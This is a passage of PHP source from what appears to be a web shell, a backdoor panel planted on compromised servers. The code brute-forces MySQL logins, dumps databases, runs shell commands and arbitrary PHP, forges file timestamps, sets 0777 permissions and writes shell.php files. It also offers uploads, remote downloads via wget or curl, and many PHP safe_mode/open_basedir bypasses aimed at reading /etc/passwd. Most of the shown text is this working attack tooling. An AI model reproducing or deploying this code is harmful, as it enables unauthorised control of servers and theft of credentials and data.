 echo $lang[$language.'_text98'].$suc."\r\n";
 }

if ($_POST['cmd']=="db_brute")
 {
 $suc = 0;
 if($_POST['brute_method']=='passwd'){
 foreach($users as $user)
  {
   $sql = new my_sql();
   $sql->db   = $_POST['db'];
   $sql->host = $_POST['db_server'];
   $sql->port = $_POST['db_port'];
   $sql->user = $user;
   $sql->pass = $user;
   if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
  }
 if(isset($_POST['reverse']))
  {
   foreach($users as $user)
    {
     $sql = new my_sql();
     $sql->db   = $_POST['db'];
     $sql->host = $_POST['db_server'];
     $sql->port = $_POST['db_port'];
     $sql->user = $user;
     $sql->pass = strrev($user);
     if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
    }
  }
 }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
  foreach($users as $user)
  {
   $sql = new my_sql();
   $sql->db   = $_POST['db'];
   $sql->host = $_POST['db_server'];
   $sql->port = $_POST['db_port'];
   $sql->user = $_POST['mysql_l'];
   $sql->pass = $user;
   if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
  }
 }
 echo "\r\n-------------------------------------\r\n";
 $count = count($users);
 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
 echo $lang[$language.'_text97'].$count."\r\n";
 echo $lang[$language.'_text98'].$suc."\r\n";
 }

if ($_POST['cmd']=="mysql_dump")
 {
  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  $sql = new my_sql();
  $sql->db   = $_POST['db'];
  $sql->host = $_POST['db_server'];
  $sql->port = $_POST['db_port'];
  $sql->user = $_POST['mysql_l'];
  $sql->pass = $_POST['mysql_p'];
  $sql->base = $_POST['mysql_db'];
  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  else {
   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
   else if($fp || @function_exists('file_put_contents')){ foreach($sql->dump as $v){ @fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");} }
   else { echo "[-] ERROR! Can't write in dump file"; }
   }
 }

echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";

function div_title($title, $id)
{
  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
}
function div($id)
 {
 if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
 $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');
 if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
 return '<div id="'.$id.'">';
 }

if(!$safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
else{
echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
echo $te.'</div>'.$table_end1.$fe;

if($safe_mode || $open_basedir){
echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
echo $te.'</div>'.$table_end1.$fe;
}

if($unix && @function_exists('touch')){
echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/HMB.php")))
.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
echo sr(15,"<b> or set  Day".$arrow."</b>",
'
<select name="day" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>'
.ws(4)."<b>Month".$arrow."</b>"
.'
<select name="month" size="1">
<option value="January">January</option>
<option value="February">February</option>
<option value="March">March</option>
<option value="April">April</option>
<option value="May">May</option>
<option value="June">June</option>
<option value="July">July</option>
<option value="August">August</option>
<option value="September">September</option>
<option value="October">October</option>
<option value="November">November</option>
<option value="December">December</option>
</select>'
.ws(4)."<b>Year".$arrow."</b>"
.'
<select name="year" size="1">
<option value="1998">1998</option>
<option value="1999">1999</option>
<option value="2000">2000</option>
<option value="2001">2001</option>
<option value="2002">2002</option>
<option value="2003">2003</option>
<option value="2004">2004</option>
<option value="2005">2005</option>
<option value="2006">2006</option>
<option value="2006">2007</option>
<option value="2006">2008</option>
<option value="2006">2009</option>
<option value="2006">2010</option>
</select>'
.ws(4)."<b>Hour".$arrow."</b>"
.'
<select name="chasi" size="1">
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
</select>'
.ws(4)."<b>Minute".$arrow."</b>"
.'
<select name="minutes" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
<option value="37">37</option>
<option value="38">38</option>
<option value="39">39</option>
<option value="40">40</option>
<option value="41">41</option>
<option value="42">42</option>
<option value="43">43</option>
<option value="44">44</option>
<option value="45">45</option>
<option value="46">46</option>
<option value="47">47</option>
<option value="48">48</option>
<option value="49">49</option>
<option value="50">50</option>
<option value="51">51</option>
<option value="52">52</option>
<option value="53">53</option>
<option value="54">54</option>
<option value="55">55</option>
<option value="56">56</option>
<option value="57">57</option>
<option value="58">58</option>
<option value="59">59</option>
</select>'
.ws(4)."<b>Second".$arrow."</b>"
.'
<select name="second" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
<option value="37">37</option>
<option value="38">38</option>
<option value="39">39</option>
<option value="40">40</option>
<option value="41">41</option>
<option value="42">42</option>
<option value="43">43</option>
<option value="44">44</option>
<option value="45">45</option>
<option value="46">46</option>
<option value="47">47</option>
<option value="48">48</option>
<option value="49">49</option>
<option value="50">50</option>
<option value="51">51</option>
<option value="52">52</option>
<option value="53">53</option>
<option value="54">54</option>
<option value="55">55</option>
<option value="56">56</option>
<option value="57">57</option>
<option value="58">58</option>
<option value="59">59</option>
</select>'
.in('hidden','cmd',0,'touch')
.in('hidden','dir',0,$dir)
.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}

$select='';
if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
if($unix && $select){
echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/HMB.php"))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}

if(!$safe_mode){
$aliases2 = '';
foreach ($aliases as $alias_name=>$alias_cmd)
 {
 $aliases2 .= "<option>$alias_name</option>";
 }
echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}

echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;

if(!$safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
}

echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"HMB.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
echo "</textarea>";
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
echo "</div></div></font>";
echo $table_end1.$fe;

if($safe_mode || $open_basedir)
{
echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0)
{
echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && $mysql_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && $mssql_on)
{
echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){
echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){
echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){
echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0)
{
echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){
echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){
echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){
echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
{
echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
{
echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0)
{
echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
{
echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0)
{
echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
{
echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}

if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
{
echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
echo "<tr><td valign=top width=70%>".$ts;
echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
echo $te."</td><td valign=top width=30%>".$ts;
echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
echo $te."</td></tr>";
echo $te.'</div>'.$table_end1;
}

if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
{
echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
echo "<tr><td valign=top width=70%>".$ts;
echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
echo $te."</td><td valign=top width=30%>".$ts;
echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
echo $te."</td></tr>";
echo $te.'</div>'.$table_end1;
}


if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.'</div>'.$table_end1.$fe;
}


if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
echo "<tr><td valign=top width=50%>".$ts;
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
echo $te."</td><td valign=top width=50%>".$ts;
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te."</td></tr>";
echo $te.'</div>'.$table_end1.$fe;
}


$select='';
if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('fopen'))){$select = "<option value=\"fopen\">fopen</option>";}
if(!$safe_mode){
 if(which('wget')){$select .= "<option value=\"wget\">wget</option>";}
 if(which('fetch')){$select .= "<option value=\"fetch\">fetch</option>";}
 if(which('lynx')){$select .= "<option value=\"lynx\">lynx</option>";}
 if(which('links')){$select .= "<option value=\"links\">links</option>";}
 if(which('curl')){$select .= "<option value=\"curl\">curl</option>";}
 if(which('GET')){$select .= "<option value=\"GET\">GET</option>";}
}
if($select){
 echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\">".$select
."</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
